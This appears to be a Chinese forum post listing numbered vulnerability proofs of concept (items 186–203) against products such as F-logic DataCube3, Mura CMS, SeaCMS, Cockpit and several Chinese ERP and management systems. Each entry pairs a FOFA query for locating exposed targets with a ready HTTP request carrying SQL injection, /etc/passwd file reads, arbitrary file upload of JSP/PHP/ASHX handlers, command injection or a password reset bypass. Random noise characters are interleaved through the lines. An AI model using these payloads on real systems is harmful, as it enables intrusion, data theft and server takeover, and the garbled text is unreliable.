# t" A8 Y: O' O( N' Z6 J* ^( ^* i/ K
186. F-logic DataCube3 SQL注入
0 u; H _2 ]9 GCVE-2024-31750! q. g+ `' {7 ]' N5 Q# L8 E/ N
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
9 R* Y$ e% X$ O! FFOFA:title=="DataCube3"
! ^" s+ ]2 G8 |% n/ j% ~/ C" tPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1/ y0 I' S5 U/ s; r/ u
Host: your-ip
9 ~8 _( i6 T) i* |/ X+ j! a9 R& I% TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
& B7 X+ C- M2 a5 iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
, ]3 G* T: x( e% K& y2 V" [- sAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% T2 H% R) @8 y/ n) p) J* M/ gAccept-Encoding: gzip, deflate# f! I& k# p( g0 G O
Connection: close$ I' m, x$ W9 } [& K$ a
Content-Type: application/x-www-form-urlencoded2 ^# M+ W1 e9 D2 v
5 O& {* J6 x6 W8 }" o2 u( Dreq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
7 h" y$ J K' g7 i' |# f. n4 u( B% N" g4 c# v% L( c$ R* o( B
& Z9 @3 |: g8 e' }5 j187. Mura CMS processAsyncObject SQL注入4 ^0 s1 H5 T7 q) A9 ~
CVE-2024-32640! l9 S- Y4 Y6 p- a% h$ x6 z, U
FOFA:"Mura CMS"' i* F! Q0 _8 D* M. Y: P& L, g% E
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
7 X* y0 M; c, s* k# O! wHost: your-ip
1 D7 s+ _$ L( C5 w N; Q8 kContent-Type: application/x-www-form-urlencoded; t8 [9 Z# y% @! l3 ~( U
) Z$ {9 K. z* ]4 r% A
, `$ C/ h- ^& x* i6 u# uobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
: E/ d: n \$ F8 [. e0 `1 {+ Q' A7 X. A }: _# U" D' f0 I
, U$ s) H* h$ V. r188. 叁体-佳会视频会议 attachment 任意文件读取
0 @% L- |" F# p% M2 O2 n$ Oversion <= 3.9.7
1 e* U& K4 X. [. t6 Q) AFOFA:body="/system/get_rtc_user_defined_info?site_id"
1 T; L2 \$ l% yGET /attachment?file=/etc/passwd HTTP/1.1 P3 m0 U( G* j1 t4 N7 H
Host: your-ip, W8 q4 o* [0 i8 u' `( \- E. t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36: d7 z- r C, @4 J- Q1 w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! O, Q6 t. G( Z5 p
Accept-Encoding: gzip, deflate
4 P7 F, e/ q# d& f' ~Accept-Language: zh-CN,zh;q=0.9,en;q=0.8: H+ G* I' O, l0 K3 S& o0 F
Connection: close6 P& A& v3 D/ `% {' G& A
# U/ e% ~7 G7 ]5 B( z. d* [4 c& A9 N9 I% M0 c4 y
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
# }2 n# d, C- ]* m8 w1 l0 TFOFA:app="LANWON-临床浏览系统"
2 O% H' K- Q& X1 R/ I9 BGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
7 w7 f4 H c% N4 s1 G( R# W6 DHost: your-ip0 T+ [5 F# j/ _9 }
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.369 ~- C0 U# T) T( z1 G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 u" g/ r, }- I# K8 H2 C
Accept-Encoding: gzip, deflate
% E6 U# M1 |) {3 w* R4 lAccept-Language: zh-CN,zh;q=0.97 c. W& l/ O6 q
Connection: close
0 a" r7 D" g+ R+ S1 |! y5 F4 k% \
& Y( W' X! S$ Q
3 D6 G" i; T% f7 D5 t6 P190. 短视频矩阵营销系统 poihuoqu 任意文件读取/ L( e" g. ^& o: T, i
FOFA:title=="短视频矩阵营销系统"3 n" [6 ? F3 i+ f# {& r$ K
POST /index.php/admin/Userinfo/poihuoqu HTTP/20 T4 n1 ]- Y1 I7 J" A
Host: your-ip4 `4 c0 L* h7 B. z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
- ?" `# c+ ?( B% m+ C+ z- eAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
2 p: o7 g) ], Z/ k# h* f# n. ~5 SContent-Type: application/x-www-form-urlencoded3 W9 ~' Z: \ B0 P9 w
Accept-Encoding: gzip, deflate
3 V: R# Z4 s5 K& {8 h1 JAccept-Language: zh-CN,zh;q=0.92 Q$ H& B3 h2 \; \" H
( l, n8 }* P5 \: W
poi=file:///etc/passwd6 S- i$ R! ^. ]- ^
7 K2 j, Q' Z& Q
2 y3 }7 s8 Y4 H; X1 s- ?, l5 B8 s/ O191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入; K0 o6 [8 r7 I5 T1 L& i( i
FOFA:body="/CDGServer3/index.jsp"
! T, y5 G% m4 C4 t% Z2 ^POST /CDGServer3/js/../NavigationAjax HTTP/1.1
4 r6 w" p4 j8 f" [Host: your-ip# z U5 s/ c# V. s( D- T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36% Y% N! d( N1 J! z6 M
Content-Type: application/x-www-form-urlencoded
' e9 d6 C2 t: `4 h3 Y- T
$ k$ L) W- _ icommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
# O0 i; R+ H0 q9 l6 V* S6 w$ V: G% F# y9 |/ {2 C! Q% k3 [+ s8 Y
$ }- v' a0 h6 w/ e" d1 H, C
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传1 Y/ e6 q! w/ s1 `4 G
FOFA:title="用户登录_富通天下外贸ERP"+ ?4 l; f1 s" X* c' K8 _+ f
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
3 y0 [# i1 K6 |3 `- BHost: your-ip* t8 U8 ^0 g7 ]# C! u+ ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
& k3 k1 T- o9 YContent-Type: application/x-www-form-urlencoded5 {4 J7 F( x# M0 D( F" ?
7 D; ^# E+ I! V' u4 B
T& h4 M/ Q& o& b( l) D- v3 W
<% @ webhandler language="C#" class="AverageHandler" %>( ]4 }$ u( s; S! `
using System;
( h& B+ d6 j9 t4 I* G5 b; \; ^using System.Web;! Y( S0 B1 p- Q" F( z* U& H
public class AverageHandler : IHttpHandler: G" _, l+ ^1 Q8 u
{
u s) _4 ]: g% ?* M4 }3 L# `public bool IsReusable! H" F2 Q0 i* ^
{ get { return true; } }
' `% C: z* o: a, f3 mpublic void ProcessRequest(HttpContext ctx)
5 y- k' p" D/ m/ s/ m* {+ k9 }{ H' R5 }* r$ {5 }1 a, F5 l
ctx.Response.Write("test");# U6 m8 I* P! \8 q# I9 z
}
, N3 T8 S% F* ~}/ \( U# C% @) V# o8 w* Y# c0 ^
8 S, J8 D1 |" ~: W' G" G7 q- c0 r* S
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
& G, T9 O, `! T6 C1 kFOFA:body="山石云鉴主机安全管理系统"
; G7 b- b; q" J' ?9 Q2 `7 rGET /master/ajaxActions/getTokenAction.php HTTP/1.1( w3 Z, u) e/ h) H2 i. \
Host:5 U8 ^! v! O/ t! i O
Cookie: PHPSESSID=2333333333333;
: z$ B7 K; c; e+ b" ^Content-Type: application/x-www-form-urlencoded2 _3 b( D9 `0 C/ ^# I
User-Agent: Mozilla/5.0
. J! N, }4 v) c. c& Q- y7 H" [5 H+ H: P |5 Q
; o5 F$ k- o: R; |+ a
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
) v9 F! Q) ~$ k1 _; SHost:
) X$ o$ |- c! K" k! k; }! bUser-Agent: Mozilla/5.0
0 Q3 |0 ~4 ~ _' `) WAccept-Encoding: gzip, deflate
5 _. w. [: l5 k0 R+ rAccept: */*# Z6 g3 V, {' y, X l' A# J
Connection: close! J) l" Z& h! g8 }8 d" V
Cookie: PHPSESSID=2333333333333;* e, B4 i+ Z% \6 F0 U
Content-Type: application/x-www-form-urlencoded
4 H) b3 n8 s- e! | C" j5 DContent-Length: 84
% q% L$ w, U1 _( O7 A; B8 P" M7 a0 s) t8 \0 }6 P) O
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
. F8 c7 u; {5 f( D% r
7 n5 Z+ f' e8 S* ~( _
4 ? D3 b' u% C3 t2 h3 a n: `8 UGET /master/img/config HTTP/1.1
8 c2 h$ R, v! s9 A7 o/ F6 kHost:% {) Z5 |+ w! j
User-Agent: Mozilla/5.0
& v# W9 a2 R$ F# L- t* I5 R& ~) }6 u. a8 F6 G( W9 ?
8 g B4 m6 t6 W194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传, L4 W: y/ P5 a$ ?' t. f
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在& H0 K$ v6 i4 I5 i: U. [# k# T
/ ]6 T Y5 B, B! i
POST /servlet/uploadAttachmentServlet HTTP/1.1
0 ~2 l6 k7 ^5 I# }Host: host
I5 E, H8 K& i+ J5 m: B" FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
- w* _. i+ t! Q2 n. E# O; lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
e6 V3 B: G8 k- x* m5 pAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, h6 y6 _7 |7 r! i4 ?, Y
Accept-Encoding: gzip, deflate
" w" A; S* g1 J9 w7 s1 P( m; ~Connection: close+ U) v% ?- e* L& B+ \
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk( e# v1 Y* j4 t# n
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
3 A( U/ H" k, D" ^
8 o- h$ a8 W6 b( _# eContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp" B( G& E6 b6 e. \0 M$ i
Content-Type: text/plain
, w! I+ R4 ]! Y8 B8 {1 f<% out.println("hello");%>, X& X; e, I& w
------WebKitFormBoundaryKNt0t4vBe8cX9rZk; l. j1 }$ |7 H1 z& ^* N
Content-Disposition: form-data; name="json") g& N/ B2 {: Y) i7 [6 k" p
{"iq":{"query":{"UpdateType":"mail"}}}
& K) l) ?1 i" \------WebKitFormBoundaryKNt0t4vBe8cX9rZk--9 W: ^, ?; O% Q5 n* @) S- T E
7 W L8 E( J/ K- T6 h6 C* f i
2 _2 x% n) {4 b' v, @7 I195. 飞鱼星上网行为管理系统 send_order.cgi命令执行+ M# i9 j! I9 v0 r
FOFA:title=="飞鱼星企业级智能上网行为管理系统
+ F' B) C. o7 n! ^! PPOST /send_order.cgi?parameter=operation HTTP/1.1. ?7 a; f3 A0 G. x
Host: 127.0.0.1
: N% O. H/ q- y' q. ?Pragma: no-cache% d! M5 X: Z, _& o3 s# N
Cache-Control: no-cache
9 Q0 [3 W" p2 uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.364 u* m# A# K. R0 }3 I
Accept: */*- ^2 |6 Y8 T! a, f$ [" w
Accept-Encoding: gzip, deflate& t# f6 Q3 T+ P7 G. n/ K! u1 F
Accept-Language: zh-CN,zh;q=0.97 f, B3 u) ^2 b+ p: E
Connection: close
4 p* _1 D7 F6 q: k$ i) J2 ~Content-Type: application/x-www-form-urlencoded6 q2 |, U- p' y& y) F" K
Content-Length: 689 ~2 S' j7 t9 q/ Z
& o' Z5 k. _2 C+ A6 W2 l* w3 A{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
+ a7 O5 F1 D- F+ T2 I6 U' L: p
1 y9 ^+ ]# X1 G8 \2 o9 T" ?8 N; M+ K0 M! F: T4 o$ I+ @
196. 河南省风速科技统一认证平台密码重置! ?. u; _! L( ~$ R# x" n
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
+ e7 O8 S2 h) f- z+ L' e" j. N& [7 BPOST /cas/userCtl/resetPasswordBySuper HTTP/1.1
$ t6 ^9 A( Y& f$ TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
+ D, E- w, w. p0 l' ]Content-Type: application/json;charset=UTF-8+ S7 b9 o9 Q& r; i) z
X-Requested-With: XMLHttpRequest
$ H! G `& C8 DHost:
6 ^' d, ]- |- OAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2' D3 L ] r" P: ?
Content-Length: 45, d7 `) E- z# z6 t0 _5 J) }
Connection: close4 u; h5 G1 H% M# O& e0 z
% R. t( O! Y( A( V
{"xgh":"test","newPass":"test666","email":""}. T( u( U% n% w/ W0 x, ~. E
2 W' k- V. C2 J& ~7 P* _! K) {4 b& l, ]4 [% Y [/ h; e
& x c9 p( k' h x$ a
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
" I# K8 X3 A9 MFOFA:app="浙大恩特客户资源管理系统"& a5 f! ]! Z% I1 G/ O3 z# Y
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
* l' k& |: x9 W2 u# R8 M1 uHost:
& d! W7 V+ }+ r* `User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36! ^" v! @2 W& ?9 d; Z4 |3 d: j
Accept-Encoding: gzip, deflate
2 I3 i, Z( |. K m @: t# }& CConnection: close! a ~9 y: e3 @& H& A; V
/ H8 \9 l5 w1 }% x9 a& y2 z
|3 m: V7 U, D
. ~4 P# A( h" X! e& n ?5 a4 t+ H
198. 阿里云盘 WebDAV 命令注入
* H0 o: O/ O* k1 v8 j% j9 oCVE-2024-296400 G9 l( Q2 f2 q+ ?% J; v
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1, |5 ?/ p: |' C' g( b( b+ M
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf642 x/ k) N0 |+ o( X1 l S1 C
Accept: */*6 l& p( T% J" R4 R, n$ g: Z( g
Accept-Encoding: gzip, deflate$ C9 T- |0 I* f1 N7 y+ z2 A
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6' V& U0 K8 R1 k& m+ @0 |+ S
Connection: close, N# u$ R6 O, w
2 F, S: p4 U4 R2 y* R
- ^: ~% H8 w! ^3 K1 y199. cockpit系统assetsmanager_upload接口 文件上传3 b. W* q3 N# q) Q( C3 ?' k
# e- Z- a: I R1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
+ g/ I; C% [7 e$ |9 O% d. sGET /auth/login?to=/ HTTP/1.18 M8 M. m9 r6 C! k
" D3 o7 o$ {/ G3 F- w$ o
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"5 a0 g! R+ k) F8 _& C( @" E
4 l- K9 X' l! q/ U; P5 p2.使用刚才上一步获取到的jwt获取cookie:; y! H* G0 q8 [
8 J. |5 _7 d! S6 ?$ ~' p$ P! ?
POST /auth/check HTTP/1.1. Q7 T; s, E5 K7 ]
Content-Type: application/json7 i( t' X. x. j4 |6 k& ]1 \3 V
( T1 c: K- k- w: `# u# |7 }# n
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}( b" E! C/ d7 n7 _! O+ [
( c7 N4 B+ {7 x% X# N
响应:200,返回值:: O( _# k/ e6 ?/ o' R! ^6 S5 E
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/3 j8 S' [6 ?( G- `* H8 W0 u
Fofa:title="Authenticate Please!"5 C8 e* H( n9 d' h
POST /assetsmanager/upload HTTP/1.1; G$ R# \0 t+ b3 G3 u7 c) g D
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
$ S, n8 X6 c, d$ C: b( }4 W( }Cookie: mysession=95524f01e238bf51bb60d77ede3bea92" B7 J# x2 g f* h2 p
1 G2 N% |, ]$ ?" c& w( N-----------------------------36D28FBc36bd6feE7Fb30 `: i' _2 j) R! y: e
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
* ]. H4 z% Z. i$ _# @1 H8 F/ W" IContent-Type: text/php
% ?9 E0 G3 z6 i7 |4 a( F$ t! h/ z2 N4 N* B$ S7 P5 z: w
<?php echo "tttt";unlink(__FILE__);?>6 j- R6 C( t' }1 H# S$ C( f+ g% t2 V
-----------------------------36D28FBc36bd6feE7Fb3
8 f2 A/ B8 b% C% IContent-Disposition: form-data; name="folder"
- K% a% g3 o6 T* X: ]
. \ f- Z0 F) z, \, J3 a; e" I2 [-----------------------------36D28FBc36bd6feE7Fb3--9 Y- t) a3 M8 }. T# s# m: k/ Y+ t
! b0 I$ G9 N$ _" E: Q: {; q7 Z+ m- d0 e$ a% d
/storage/uploads/tttt.php, N; [& j( o! M, }- J
, R& z% b! j) q. G& c) E( i
200. SeaCMS海洋影视管理系统dmku SQL注入3 l- A* A# A0 m1 N9 s- o
FOFA:app="海洋CMS"
6 f! f) {( B5 L' JGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
& X5 v$ @) V4 ]' \4 X! E iCookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s! X: O5 k7 u* x; e% @0 S! X
Upgrade-Insecure-Requests: 1
4 H: T! z- Z S$ j. {1 O$ zCache-Control: max-age=0# H5 E: U% ~/ j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, {3 U+ Q C# x! M4 M0 B6 H2 P
Accept-Encoding: gzip, deflate$ }& V) }! m; G
Accept-Language: zh-CN,zh;q=0.9- s, ?5 e4 x3 |: w% Q
- Y% }( w @ Y1 q; Z0 G
8 W& V. [* ]/ B' E( h: a2 ^201. 方正全媒体新闻采编系统 binary SQL注入
' Q+ q. `* B% W& S% D) i! @1 K2 BFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
0 ?+ M9 V( q7 y6 o- c8 vPOST /newsedit/newsplan/task/binary.do HTTP/1.1' z, L2 j0 [% ~4 h% K3 E' M
Content-Type: application/x-www-form-urlencoded
; v( j E& O. @& m* N2 a! XAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* O+ z& e" T: H+ M F3 QAccept-Encoding: gzip, deflate
- |8 G; K5 A) g3 T% ~Accept-Language: zh-CN,zh;q=0.9' f: Q% g; a3 a! V n; t# a
Connection: close
/ S. ]$ Q. b$ j R7 @3 |( G+ F$ T) f( E' e& t( N, b, J
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1: J4 e4 T$ I! L' Y& e
# v D5 \7 {& M
0 ^. E$ r2 A' v/ Y! d+ ^/ g6 h202. 微擎系统 AccountEdit任意文件上传% c- _; W" E* f* t
FOFA:body="/Widgets/WidgetCollection/"
# B3 d+ B5 X Q7 u获取__VIEWSTATE和__EVENTVALIDATION值. X, r# h3 }( \; ]
GET /User/AccountEdit.aspx HTTP/1.16 o9 U/ f; x0 z+ b0 O* K+ T: {& h
Host: 滑板人之家0 \/ q; q+ L" `) [8 A, ?! t9 Q( l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
# T3 }$ A: ~8 G2 e0 |Content-Length: 0
1 [( M$ T4 R. d6 k' q3 T P- q: a6 \9 p7 u, R
0 F7 d/ m( G$ r- I替换__VIEWSTATE和__EVENTVALIDATION值 S8 k3 u3 a4 m- M) P
POST /User/AccountEdit.aspx HTTP/1.1' ^4 V' \% Q7 B! F
Accept-Encoding: gzip, deflate, br* \- s q* @2 o8 i5 ?
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
$ C4 U; Y3 `4 ~. |( r2 `. S! o2 X0 W4 O8 E5 V3 r' h1 ^- x
-----------------------------786435874t38587593865736587346567358735687
7 K" K M+ O/ E9 n5 dContent-Disposition: form-data; name="__VIEWSTATE"6 o. v. V' J& A2 @' Z: Z
+ V7 y2 b2 ?, n__VIEWSTATE
6 S h1 D) p$ J# |# l- Y% g-----------------------------786435874t38587593865736587346567358735687
; D6 Y. |; F6 a. eContent-Disposition: form-data; name="__EVENTVALIDATION"
6 y+ E# ]+ K) @* |/ Z
% ?4 U) i# L" z__EVENTVALIDATION
- t1 ^& ^" E& i4 @9 d: X1 I-----------------------------786435874t38587593865736587346567358735687
8 I) l" N" `" O% C4 |Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt" D! X+ f, w. }: @* Y8 f; ^2 D$ K
Content-Type: text/plain6 l- A% i, a, x: g9 m6 H* I
' X1 a) G8 K- J& ^* {* r
Hello World!# A. K5 j: J x8 [" S
-----------------------------786435874t38587593865736587346567358735687; s+ `, O; r4 J; t- I5 B: ~
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"3 P* D3 U5 t; v) Z* v4 n! e8 U! v
( \/ T& W7 a3 M# r& ?( r
上传图片 G b' l8 R( o/ m/ f3 V" Z
-----------------------------786435874t38587593865736587346567358735687
1 `3 O7 u. ]- t) f) N9 VContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"9 d0 f, J1 N- X) w1 Q
& ^! c6 _2 s# ?' v# i2 u# J5 u9 Y7 z; N) W% E; a/ r
-----------------------------786435874t38587593865736587346567358735687
, N _; b6 K% C! ] m2 v* F8 C1 mContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"& Y6 i; t, ]0 X6 B$ \
+ S/ a" w9 S, F3 _6 R; P" b; d& J" M2 l) \0 h$ w( A6 W
-----------------------------786435874t38587593865736587346567358735687--
- X) Z7 k, S. @5 h, X% t& }
* r& o L; p& T
3 ~8 c$ F7 v4 ^2 p& n/_data/Uploads/1123.txt
& L) w" P# w6 }) \+ f }- c( D5 d0 E; N& G
203. 红海云EHR PtFjk 文件上传2 ]/ y: o' r0 \$ Q! H5 u
FOFA:body="RedseaPlatform"/ b) M6 b% ~) T, Y; U5 s5 z
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
% b9 z3 o4 ~# }* Y1 E% C; G; X$ RHost: x.x.x.x
, O& c+ c. z% L) ^9 UAccept-Encoding: gzip$ _% Z: B: a% [3 W
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 p% c3 |3 {& F: D) T
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys40 E+ M5 b$ K! L) Z$ S: D, n
Content-Length: 210
( W: `4 s0 H+ e% H8 k/ @' k# g7 c$ Z- x0 A+ r/ x3 v
------WebKitFormBoundaryt7WbDl1tXogoZys4
! i9 `+ G+ U1 o) f. sContent-Disposition: form-data; name="fj_file"; filename="11.jsp"
" x) @& ^; J8 v/ W4 SContent-Type:image/jpeg
$ Q) X( s9 D+ L8 U5 U& f3 j# c/ C Q2 d7 X7 Z% ?7 A8 K" U
<% out.print("hello,eHR");%>
& S! X; k& {* f: F. g------WebKitFormBoundaryt7WbDl1tXogoZys4--
' O4 u$ E) H) m) p3 Q) ~1 g/ O* t, P! Y5 r
- u8 a9 v( J0 g8 l& ~% g5 u" W1 T+ V1 z' u9 B" l- O/ J
4 _ \+ ?- Q7 |9 G& U& J; l0 `: g, x6 a# h) L
7 l- G9 x6 U4 t2 D$ h# u0 M# k
|
发表于 2024-6-5 14:31:29
收藏
支持
反对